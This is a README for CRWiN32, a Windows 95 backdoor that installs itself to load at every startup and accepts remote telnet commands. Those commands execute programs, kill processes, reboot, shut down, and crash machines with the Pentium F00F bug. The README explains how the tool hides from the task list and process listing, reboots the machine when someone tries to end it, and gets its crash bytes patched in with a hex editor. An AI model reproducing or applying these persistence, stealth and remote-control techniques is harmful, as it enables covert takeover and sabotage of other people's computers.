CRWiN32 README
--------------

1. INSTALLING / UNINSTALLING

To install this program, copy CRWIN32.EXE into your Windows directory and type

    "crwin32 /setup"

This will add a value to your registry which will cause CRWiN32 to load every time Windows starts.

To remove the program, type

    "crwin32 /remove"

This will remove all CRWiN32 information from your registry; you can then delete CRWIN32.EXE (and CRWIN32.DAT - see below).

2. LOG FILE

CRWiN32 logs all connections from clients to a file "CRWIN32.DAT" in your Windows directory. Any error messages are also logged here.

3. USING CRWiN32

To connect to CRWiN32 from a remote computer, telnet to the machine running CRWiN32, on the port CRWIN_PORT (check crwin32.c for this value). Do not use Windows95 TELNET.EXE for this; you will be disconnected.

You can then type any of the following commands:

"exec [full path of program on remote computer]"
    This will execute a program installed on the remote computer.

"harakiri"
    This will cause CRWiN32 to commit harakiri. For those unfamiliar with this word, it means ritual suicide (i.e. CRWiN32 terminates).

"kill [process number]"
    This will kill a specified process. See the command "ps". Killing KERNEL32.DLL will most likely crash the remote computer.

"nuke"
    This will attempt to execute the Pentium Bug on the remote computer. It will probably cause CRWiN32 to terminate on non-Pentium machines. The "Pentium Bug" is the four bytes F00FC7C8.

"ps"
    This will list all processes running on the remote computer, except for CRWiN32.

"quit"
    Disconnect from CRWiN32.

"reboot"
    Shuts down Windows 95 on the remote computer and reboots the machine. Any running processes are terminated forcefully.

"shutdown"
    Shuts down Windows 95 on the remote computer and turns off ATX machines.

4. EXITING CRWiN32

To terminate CRWiN32 once it is running on a computer, either

(a) Kill it through a telnet session (see 3. USING CRWiN32), or
(b) Kill it with something like PVIEW95.EXE.

With earlier versions (pre 1.5), pressing CTRL+ALT+DEL and attempting to kill CRWiN32 through the task manager would have rebooted your computer. In fact, CRWiN32 will reboot your computer when any program tries to kill it with ExitProcess() [Pview95 uses TerminateProcess()].

5. COMPILING CRWiN32

CRWiN32 was compiled with Microsoft Visual C++ 5.0, though it should work with other compilers. The only extra thing which needs to be done once CRWiN32 is compiled is to hex-edit the Pentium Bug. This is done as follows:

(a) Open CRWIN32.EXE in your favourite hex editor.
(b) Search for the bytes 33C033C0.
(c) Replace with F00FC7C8.

If this is not done, then activating the Pentium Bug through CRWiN32 will not work.

6. VERSION HISTORY

1.5 After reverse engineering Back Orifice, I found out about the wonderful RegisterServiceProcess function. Just like Back Orifice, CRWiN32 no longer appears on the CTRL+ALT+DEL task list.

1.4 CRWiN32 now detects the presence of Back Orifice, by The Cult of the Dead Cow. On startup CRWiN32 prompts the user whether to remove Back Orifice from the machine.

1.3 Added the commands "exec", "shutdown", "reboot", "harakiri". "ps" no longer shows the presence of CRWiN32.

1.2 Added the commands "ps", "kill".

1.0 First release. Capable of crashing a machine with the Pentium Bug. Available commands are "nuke", "quit".